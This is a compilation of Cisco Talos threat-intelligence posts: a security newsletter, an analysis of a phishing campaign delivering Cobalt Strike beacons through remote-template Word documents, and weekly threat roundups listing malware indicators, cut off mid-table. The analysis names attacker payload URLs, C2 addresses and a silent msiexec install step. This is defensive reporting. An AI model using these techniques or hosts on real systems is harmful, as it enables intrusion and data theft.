1acb437594832fbf922ea62142314c31026f4345dfd31cf843acb52eca1aec92 1cc621b3d1a8db17783e813726cee6309e7802110a6d93779b7096e723023628 39b43b15aeb0a1aff4ca35928a2dd25aa6439c2faa24721424a749cd5b376153 57e6addd9c1c9f9367c48020e1f004a26cd6b361c6145ec97e554fd991ca5925 6bc8e9d23757833faff22d586d92d2274283e5bbe400bf07fdd2c5a070f39bd2 84238de8af6828ea6864308ce0ea0f0e798c31c2e105c3b7bf0f238732738d78 8f1566be038140548e9c1350a9ae28d95c1b70b8f79c0ba3ba094ffec8b530c2 914e1a2a9ca34ba6b66795165ea9e57d2817f3aa23ed662a565c9ad6c6476459 a9b1fb4abbebe49a65998d688a02819d8bdc3eeeebad496b94b5f6b27ff4e49b b7f64dd2cb3cb310bfbbd54e29b4f9c03e94bd474ab487e403aec3357350307a c6c1fcd270017f81a8113545eb42471f98700eb162ccbd4272b54de6435c4971 f4fd5a689233ea0c7c0d1599f14b68554f5c07f0c12c86981e0eef4be06940be fb2a62eecd3f1a04e0633f43d472229ef3994de0a212da08d21c9fea8577016e

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK






Threat Source newsletter (Sept. 29, 2022) — Personal health apps are currently under a spotlight, but their warning signs have always been there

29 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve spent the past few months with my colleague Ashlee Benge looking at personal health apps’ privacy policies. We found several instances of apps that carry sensitive information stating they would share certain information with third-party advertisers and even law enforcement agencies, if necessary. 

One of the most popular period-tracking apps on the Google Play store, Period Calendar Period Tracker, has a privacy policy that states it will "share information with law enforcement agencies, public authorities, or other organizations if We’re [sic] required by law to do so or if such use is reasonably necessary. We will carefully review all such requests to ensure that they have a legitimate basis and are limited to data that law enforcement is authorized to access for specific investigative purposes only." 

A report from the Washington Post also released last week found that this app, as well as popular health sites like WebMD, “gave advertisers the information they’d need to market to people, or groups of consumers based on their health concerns.” 

To me — these were all things I had never considered before. I’m sure I’m not alone in just going to Google to type in “pain in left flank” or something along those lines to see if I’m dying or not. The research Ashlee and I did really make me rethink the type of information I’m inputting into apps on my phone, especially around my health. For example, I de-coupled the Google Fit tracking from my phone so it’s not just counting steps in the background. And I’ve switched to a privacy-focused browser on my personal computer at home (it doesn’t help that I’m also mad at Chrome for ending support for ad blockers).  

I’m actually mad at myself that it took me this long to think more critically about this topic. The research has always been out there. 

A 2018 study from Privacy International found that 61 percent of apps they tested immediately started sharing data with Facebook the instant a user opens the app  — this was at the peak of the discussion around the Cambridge Analytica/Facebook scandal. And the U.S. Federal Trade Commission filed a complaint against the Flo period-tracking app in January 2021 for misleading users about who it sends personal information to. 

We, collectively as a society, should have always been taking this issue more seriously. And the recent Supreme Court ruling in Dobbs v. Jackson Women's Health Organization is highlighting how personal data stored on apps could lead to legal consequences. The warning sides have always been there, but I think we were just too willing to trade in convenience in exchange for our privacy, thinking many of us have “nothing to hide.”  


The one big thing 


Insider threats are becoming an increasingly common part of the attack chain, with malicious insiders and unwitting assets playing key roles in incidents over the past year. This is becoming an increasing challenge for companies that now have remote workers all over the globe, many of whom may never come back to the office again. And if one of these employees leaves, it could leave some major security gaps. Over the past six months to a year, Talos has seen an increasing number of incident response engagements involving malicious insiders and unwitting assets being compromised via social engineering. 

Why do I care? 

Insider threats are different than “traditional” cyber attacks we think of because it’s not about a threat actor sitting in an entirely different country lobing malicious code at a network. It usually involves trying to socially engineer someone into unwittingly letting their guard down and providing access to a malicious user or giving up sensitive information in exchange for some money. This can seriously happen to anyone anywhere, increasingly so in the era of hybrid work. 

So now what?

Defending against these types of insider threats is difficult for a variety of reasons, but first and foremost, they typically are allowed to access the network and have valid login credentials. This is where traditional security controls like user and access control come into play. Organizations should limit the amount of access a user has to the minimum required for them to perform their job. 

 

Top security headlines from the week


Ukraine is warning that Russian state-sponsored actors are still targeting critical infrastructure with cyber attacks. The campaigns would likely be to “increase the effect of missile strikes on electrical supply facilities,” the Ukrainian government said. The warning also stated that the actors would also target Baltic states and Ukrainian allies with distributed denial-of-service attacks. Meanwhile, the U.S. continues to invest money into Ukraine’s cyber defenses and volunteer hackers continue to pitch in across the globe. (CyberScoop, Voice of America

U.K. police arrested a teenager allegedly involved in the recent Rockstar data breach, which included leaked information regarding the upcoming “Grand Theft Auto VI” video game. The suspect may have ties to the Lapsus$ ransomware group and have some involvement in another data breach against the Uber rideshare company. Lapsus$’s recent activities are vastly different from what APTs’ traditional goals are, usually related to making money somehow, instead opting to just seemingly want to cause chaos of the sake of it. These two major breaches highlight the fact that many major organizations have unaddressed vulnerabilities. (TechCrunch, Wired

A disgruntled developer leaked the encryptor behind the LockBit 3.0 ransomware, the latest in a line of drama with the group. The builder works and could allow anyone to build their own ransomware. The Bl00Dy ransomware gang has already started to use the leaked builder in attacks against companies. Bl00Dy has been operating since May 2022, first targeting medical and dental offices in New York. In the past, the group has also used leaked code from Babuk and Conti to build their ransomware payloads. They also claim to have a Tor channel they use to post leaks from affected companies if they do not pay the ransom. (The Record, Bleeping Computer


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

GovWare 2022 (Oct. 18 - 20)
Sands Expo & Convention Centre, Singapore 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a     
Typical Filename: LwssPlayer.scr     
Claimed Product: 梦想之巅幻灯播放器     
Detection Name: Auto.125E12.241442.in02 

MD5: 10f1561457242973e0fed724eec92f8c   
Typical Filename: ntuser.vbe   
Claimed Product: N/A    
Detection Name: Auto.1A234656F8.211848.in07.Talos 

MD5: 8a5f8ed00adbdfb1ab8a2bb8016aafc1   
Typical Filename: RunFallGuys.exe 
Claimed Product: N/A 
Detection Name: W32.Auto:c326d1.in03.Talos 

MD5: 147c7241371d840787f388e202f4fdc1 
Typical Filename: EKSPLORASI.EXE 
Claimed Product: N/A  
Detection Name: Win32.Generic.497796 

New campaign uses government, union-themed lures to deliver Cobalt Strike beacons

28 September 2022 at 12:12
By Chetan Raghuprasad and Vanja Svajcer.
  • Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
  • Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand.
  • The attack involves a multistage and modular infection chain with fileless, malicious scripts.

Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints.

The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office. If a victim opens the maldoc, it downloads a malicious Word document template hosted on an attacker-controlled Bitbucket repository.

Talos discovered two attack methodologies employed by the attacker in this campaign: One in which the downloaded DOTM template executes an embedded malicious Visual Basic script, which leads to the generation and execution of other obfuscated VB and PowerShell scripts and another that involves the malicious VB downloading and running a Windows executable that executes malicious PowerShell commands to download and implant the payload.

The payload discovered is a leaked version of a Cobalt Strike beacon. The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon's traffic.

Although the payload discovered in this campaign is a Cobalt Strike beacon, Talos also observed usage of the Redline information-stealer and Amadey botnet executables as payloads.

This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim's system memory. Defenders should implement behavioral protection capabilities in the organization's defense to effectively protect them against fileless threats.

Organizations should be constantly vigilant on the Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker's attempts in the earlier stage of the attack's infection chain.

Initial vector

The initial infection email is themed to entice the recipient to review the attached Word document and provide some of their personal information.

Initial malicious email message.

The maldocs have lures containing text related to the collection of personally identifiable information (PII) which is used to determine the eligibility of the job applicant for employment with U.S. federal government contractors and their alleged enrollment status in the government's life insurance program.

The text in the maldoc resembles the contents of a declaration form of the U.S. Office of Personnel Management (OPM) which serves as the chief human resources agency and personnel policy manager for the U.S. federal government.

Contents of maldoc sample 1.

Another maldoc of the same campaign contains a job description advertising for roles related to delegating development, PSA plus — a prominent New Zealand trade union — and administrative support for National Secretaries at the Public Service Association office based out of Wellington, New Zealand. The contents of this maldoc lure resemble the legitimate job description documents for the New Zealand Public Service Association, another workers' union for New Zealand federal employees, headquartered in Wellington.

Contents of maldoc sample 2.

PSA New Zealand released this legitimate job description document in April 2022. The threat actor constructed the maldoc to contain the text lures to make it appear as a legitimate document on May 6, 2022. Talos' observation shows that the threat actors are also regular consumers of online news.

Attack methodologies

Attack methodologies employed by the actor in this campaign are highly modularised and have multiple stages in the infection chain.

Talos discovered two different attack methodologies of this campaign with a few variations in the TTPs', while the initial infection vector, use of remote template injection technique and the final payload remained the same.

Method 1

This is a modularised method with multiple stages in the infection chain to implant a Cobalt Strike beacon, as outlined below:

Summary of attack method 1 infection chain.

Stage 1 maldoc: DOTM template

The malicious Word document contains an embedded URL, https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/EmmaJardi.dotm, within its relationship component "word/_rels/settings.xml.rels". When a victim opens the document, the malicious DOTM file is downloaded.

Contents of settings.xml.rels of maldoc.

Stage 2: VBA dropper

The downloaded DOTM executes the malicious Visual Basic for Applications (VBA) macro. The VBA dropper code contains an encoded data blob which is decoded and written into an HTA file, "example.hta," in the user profile local application temporary folder. The decoded content written to an HTA file is the next VB script, which is executed using the ShellExecuted method.

Stage 2 VBA dropper.

Stage 3 VB script

The third-stage VBS structure is similar to that of the stage 2 VB dropper. An array of the encoded data will be decoded to a PowerShell script, which is generated in the victim's system memory and executed.

Stage 3 VB script.

Stage 4 PowerShell script

The PowerShell dropper script executed in the victim's system memory contains an AES-encrypted data blob as a base64-encoded string and another base64-encoded string of a decryption key. The encoded strings are converted to generate the AES encrypted data block and the 256-bit AES decryption key. Using the decryption key, the encrypted data generates a PowerShell downloader script, which is executed using the PowerShell IEX function.

Stage 4 PowerShell script.

Stage 5 PowerShell downloader

The PowerShell downloader script is obfuscated and contains encoded blocks that are decoded to generate the download URL, file execution path and file extensions.

The following actions are performed by the script upon its execution in victim's system memory:

  1. The script downloads the payload from the actor controlled remote location through the URL "https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/newmodeler.dll" to the user profile local application temporary folder.
  2. The script performs a check on the file extension of the downloaded payload file.
  3. If the payload has the extension .dll, the script will run the DLL using rundll32.exe exhibiting the use of sideloading technique.
  4. If the payload has an MSI file extension, the payload is executed using the command
    "msiexec /quiet /i <payload>".
  5. If the payload is an EXE file, then it will run it as a process using the PowerShell commandlet
    Start-Process.
  6. Upon running the payload, the script will hide the payload file to establish persistence by setting the "hidden" file system attribute of the payload file.

During our analysis, we discovered that the downloaded payload is a Cobalt Strike DLL beacon.

Stage 5 PowerShell downloader.

Method 2

The second attack method of this campaign is also modular, but is using less sophisticated Visual Basic and PowerShell scripts. We spotted that, in the attack chain, the actor employed a 64-bit Windows executable downloader which executes the PowerShell commands responsible for downloading and running the Cobalt Strike payload.

Summary of attack method 2 infection chain.

Stage 1 maldoc: DOTM template

When a victim opens the malicious document, Windows attempts to download a malicious remote DOTM template through the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/ww.dotm," which was embedded in its relationship component of the file settings.xml.rels."

Contents of settings.xml.rels of maldoc.

Stage 2 VB script

The DOTM template contains a VBA macro that executes a function to decode an encoded data block of the macro to generate the PowerShell downloader script and execute it with the shell function.

Stage 2 VB script.

Stage 3 PowerShell downloader

The PowerShell downloader command downloads a 64-bit Windows executable and runs it as a process in the victim's machine.

Stage 3 PowerShell downloader.

Stage 4 downloader executable

The downloader is a 64-bit executable that runs as a process in the victim's environment. It executes the PowerShell command, which downloads the Cobalt Strike payload DLL through the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/strymon.png" to the userprofile local application temporary directory with a spoofed extension .png and sideloads the DLL using rundll32.exe.

Stage 4 downloader EXE.

The downloader also executes the ping command to the IP address 1[.]1[.]1[.]1 and executes the delete command to delete itself. The usage of ping command is to instill a delay before deleting the downloader.

Payload

Talos discovered that the final payload of this campaign is a Cobalt Strike beacon. Cobalt Strike is a modularised attack framework and is customizable. Threat actors can add or remove features according to their malicious intentions. Employing Cobalt Strike beacons in the attacks' infection chain allows the attackers to blend their malicious traffic with legitimate traffic and evade network detections. Also, with its capabilities to configure commands in the beacon configuration, the attacker can perform various malicious operations such as injecting other malicious binary into the running processes of the infected machines and can avoid having a separate injection module implants in their infection chain.

The Cobalt Strike beacon configurations of this campaign showed us various characteristics of the beacon binary:
  • C2 server.
  • Communication protocols.
  • Process injection techniques.
  • Malleable C2 Instructions.
  • Target process to spawn for x86 and x64 processes.
  • Watermark : "Xi54kA==".
Cobalt Strike beacon configuration sample.

The Cobalt Strike beacon used in this campaign has the following capabilities:
  • Executes arbitrary codes in the target processes through process injection. Target processes described in the beacon configuration related to this campaign include:
  x86:
    "%windir%\syswow64\dns-sd.exe"
    "%windir%\syswow64\rundll32.exe"
    "%windir%\syswow64\dllhost.exe -o enable"

  x64:
    "%windir%\sysnative\getmac.exe /V"
    "%windir%\sysnative\rundll32.exe"
    "%windir%\sysnative\DeviceParingWizard.exe"

  • A high-reputation domain defined in the HostHeader component of the beacon configuration. The actor is using this redirector technique to make the beacon traffic appear legitimate and avoid detection.

Malicious repository

The attacker in this campaign has hosted malicious DOTM templates and Cobalt Strike DLLs on Bitbucket using different accounts. We spotted two attacker-controlled accounts "atlasover" and "clouchfair" in this campaign: https[://]bitbucket[.]org/atlasover/atlassiancore/downloads and https[://]bitbucket[.]org/clouchfair/oneproject/downloads.

During our analysis, the account "atlasover" was live and showed us the hosting information of some of the malicious files in this campaign.

Attacker-controlled bitbucket repository.

Talos also discovered in VirusTotal that the attacker operated the Bitbucket account "clouchfair," using the account to host two other information stealer executables, Redline and Amadey, along with a malicious DOTM template and Cobalt Strike DLL.

Command and control

Talos discovered the C2 server operated in this campaign with the IP address 185[.]225[.]73[.]238 running on Ubuntu Linux version 18.04, located in the Netherlands and is a part of the Alibaba cloud infrastructure.

Shodan search results showed us that the C2 server contained two self-signed SSL certificates with the serial numbers 6532815796879806872 and 1657766544761773100, which are valid from July 14, 2022 - July 14, 2023.

SSL certificate associated with the C2 servers.



Pivoting on the SSL certificates disclosed another Cobalt Strike C2 server with the IP address 43[.]154[.]175[.]230 running on Ubuntu Linux version 18.04 located in Hong Kong, which is also part of Alibaba cloud infrastructure and more likely is operated by the same actor of this campaign.

Coverage

Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort Rule 60600 is available for this threat.

The following ClamAV signatures have been released to detect this threat:
Win.Packed.Generic-9956955-0
Win.Malware.CobaltStrike-9968593-1
Win.Dropper.AgentTesla-9969002-0
Win.Dropper.Swisyn-9969191-0
Win.Trojan.Swisyn-9969193-0
Win.Malware.RedlineStealer-9970633-0

IOC

The IOC list is available in Talos' Github repo here.


Threat Roundup for September 16 to September 23

23 September 2022 at 22:06

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 16 and Sept. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, orokibot ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.NetWire-9970213-0 Dropper NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Trojan.LokiBot-9970418-0 Trojan Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Ransomware.Cerber-9970426-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Packed.Gamarue-9970619-0 Packed Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud.
Win.Packed.Nanocore-9970631-0 Packed Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Dropper.Formbook-9970817-0 Dropper Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.
Win.Ransomware.BlackMatter-9970818-0 Ransomware BlackCat ransomware, also known as "ALPHV", has quickly gained notoriety for being used in double ransom attacks against companies in which attackers encrypt files and threaten to leak them. It uses the combination of AES128-CTR and RSA-2048 to encrypt the files on the victim's computer.
Win.Dropper.DarkKomet-9970824-0 Dropper DarkKomet is a freeware remote access trojan released by an independent software developer. It provides the same functionality you would expect from a remote access tool: keylogging, webcam access, microphone access, remote desktop, URL download and program execution, etc.

Threat Breakdown

Win.Dropper.NetWire-9970213-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WindowsUpdate
7
Mutexes Occurrences
8-3503835SZBFHHZ 5
73M9N-T0-UB83K6J 2
S-1-5-21-2580483-12441695089072 2
S-1-5-21-2580483-12443106840201 2
1N6PO-QCTT825WY- 2
S-1-5-21-2580483-1244465298972 1
3MAM487FD866043M 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
149[.]154[.]167[.]220 7
34[.]102[.]136[.]180 4
198[.]54[.]117[.]215 2
198[.]54[.]117[.]210/31 2
99[.]83[.]154[.]118 2
54[.]251[.]110[.]33 2
198[.]54[.]117[.]217 1
198[.]71[.]232[.]3 1
2[.]57[.]90[.]16 1
185[.]107[.]56[.]59 1
52[.]20[.]84[.]62 1
34[.]117[.]168[.]233 1
69[.]163[.]224[.]231 1
109[.]123[.]121[.]243 1
216[.]40[.]34[.]41 1
199[.]59[.]243[.]222 1
31[.]220[.]126[.]24 1
172[.]96[.]191[.]143 1
45[.]224[.]128[.]33 1
207[.]244[.]241[.]148 1
162[.]213[.]255[.]94 1
172[.]67[.]180[.]112 1
23[.]230[.]152[.]134 1
154[.]86[.]220[.]203 1
104[.]247[.]82[.]53 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]telegram[.]org 7
www[.]wearestallions[.]com 2
www[.]intelsearchtech[.]com 2
www[.]kigif-indonesia[.]com 2
www[.]homecrowds[.]net 2
www[.]beachloungespa[.]com 2
www[.]northpierangling[.]info 1
www[.]xn--agroisleos-09a[.]com 1
www[.]cacconsults[.]com 1
www[.]fdupcoffee[.]com 1
www[.]drivemytrains[.]xyz 1
www[.]banchers[.]com 1
www[.]olympushotel[.]xyz 1
www[.]imbtucan[.]site 1
www[.]leeanacosta[.]com 1
www[.]searchnewsmax[.]com 1
www[.]supera-digital[.]com 1
www[.]fitnesshubus[.]com 1
www[.]kettlekingz[.]co[.]uk 1
www[.]meditgaming[.]store 1
www[.]alpenfieber-events[.]com 1
www[.]bobijnvidit[.]xyz 1
www[.]thespecialtstore[.]com 1
www[.]momotou[.]xyz 1
www[.]tricon[.]info 1
*See JSON for more IOCs
Files and or directories created Occurrences
%HOMEPATH%\temp 12
%TEMP%\RegSvcs.exe 7
\9_101\jhipudjmrh.pdf 1
%TEMP%\5_610\wuqiiqpl.cpl 1
\9_101\kxfbovr.dll 1
%TEMP%\5_610\xjusg.bin 1
\9_101\lbmnehl.log 1
%TEMP%\5_610\xpdmnqvrj.cpl 1
\9_101\lexccit.txt 1
%TEMP%\5_610\xxnvjp.log 1
\9_101\lpuhp.docx 1
\9_101\lresp.xl 1
\9_101\mitwohb.dll 1
\9_101\mnxau.jpg 1
\9_101\mrbwugug.ico 1
\9_101\mvevanqm.pdf 1
\9_101\nimkrnwadi.mcq 1
\9_101\njbrtxdts.xls 1
\9_101\njxivhu.ppt 1
\9_101\nnnbox.exe 1
\9_101\nxvix.log 1
\9_101\oavf.xml 1
\9_101\ocuqib.dll 1
\9_101\oipjamjjo.jpg 1
\4_58\vxgw.cpl 1
*See JSON for more IOCs

File Hashes

17d3937fb3aceacc0ac99f94a2347b87b22cbc2e7c341830ad9ad0a8f88babee 27288965d55cf7459cfa35b7a37ab9298f34e6e7734f6d6609527d573e5db71e 3788fc76ea84b87735527d224d39b4672b970c6bbcdd59b60978945b76d0fb1b 39ef261dd5ada5c7b29412ca0e95e6950de77ac8ab9f6e096692fd553a6e3ace 4101b1f2efa7e4ac9711140c8e5e724bf5a74ac0b4ab76f0d6c4e23374977627 49f2bb5892eda8223f4709f6b84366911b000652eb19085b09dc5998fe8c8259 815132096b824dbe0c8497cfd85f7508eeac3718c147541c791701df09b6f196 8f8813e3ed0cdb3ac92de8e6003bc83c0ec859fc717748cab6a45f56a98a9201 a96ccfc5b5b64660b986d22b9bcc96cb5e178d3d506893bd24a959a5338a4a32 d22989a65a91ee78b6af2fd2a9cadf2656637959cc07cd1b92baeb8c5950b45d e2ad52e5cc9b5e5a51811e13daeed3f6d61e239a079ec3617f2c1a4400f6dcaf f7a74e6284a41f39cba3f0c186c61ad96fac8a3099b88e04071fdd8e1eabe9bf

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Trojan.LokiBot-9970418-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME 11
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME\NEAPOLITANERE 11
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME\NEAPOLITANERE\BINOCLES 11
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME\NEAPOLITANERE\BINOCLES\UDPRINT 11
<HKLM>\SOFTWARE\WOW6432NODE\TOXOSIS 11
<HKLM>\SOFTWARE\WOW6432NODE\TOXOSIS\BENZENSULFONAT 11
<HKLM>\SOFTWARE\WOW6432NODE\TOXOSIS\BENZENSULFONAT\INGEVALDS 11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SKABHALS 11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SKABHALS\AMARYLLIS 11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SKABHALS\AMARYLLIS\RECHARTING 11
<HKLM>\SOFTWARE\WOW6432NODE\PAADMME\NEAPOLITANERE\BINOCLES\UDPRINT
Value Name: Girleen
11
<HKLM>\SOFTWARE\WOW6432NODE\TOXOSIS\BENZENSULFONAT\INGEVALDS
Value Name: befugteres
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SKABHALS\AMARYLLIS\RECHARTING
Value Name: Krogfiskeri
11
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
103[.]170[.]254[.]140 1
Files and or directories created Occurrences
%LOCALAPPDATA%\Konstellations 11
%LOCALAPPDATA%\Konstellations\Materes 11
%LOCALAPPDATA%\Konstellations\Materes\window-restore-symbolic.symbolic.png 11
%TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp 11
%TEMP%\ns<random, matching '[a-z][A-F0-9]{4}'>.tmp\System.dll 11
%LOCALAPPDATA%\Konstellations\Materes\Arider.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\FROSSEN.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Praktikleder8.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Digoxins6.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\BIOSYNTHESIZE.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\countertime.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\ACRITOL.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\lnlige.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Kloakeringsomraadet.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Coitalt.bmp 1
%LOCALAPPDATA%\Konstellations\Materes\Charlies.bmp 1

File Hashes

14d11fc331b5d9a84a42fa8b6b2155f687cf66c1af5bd32ae1347fda6667fa60 2d15ef038e1702ebcd7b6d50eab97db925195cb382a9cabcf6a70ac62452d39c 418a2c968f439988a20034816348d47e0ba3fa2a6150a1f5760202a8b3a5621e 7d48995a3e95a8f0f758601cc5fbedbda1570eb17fd73e3091e6690a4f423a45 a0f0783a36626040af491251f7fc77bdfd3fdc89ee7d8ade8a289828c35e9280 a4238922317136e633e9dd9d654fd89cc47414766a658a3bdcb16963aa191ed0 a72cbeca7367862e3597f4923b36ef84c534d771aa1d439ab21bc74de1dde400 ca449b3e0e043546c5746fa6787b29c94ecb86b3f42de21e944d704502ade3da d4912d4d34d11e30c5859742186d8355a42b1e83fb54ac2a121186fa46234862 d93f4740ef92a826d328f73dea62803903254fbcdb1e02aeb6dc78e214bc0645 f0ece4c4a676aef252751fa3277e1ad4a3e1050c177bd289994c63852ae3198e

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Ransomware.Cerber-9970426-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 24 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-1
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-2
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-4
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-3
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
24
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
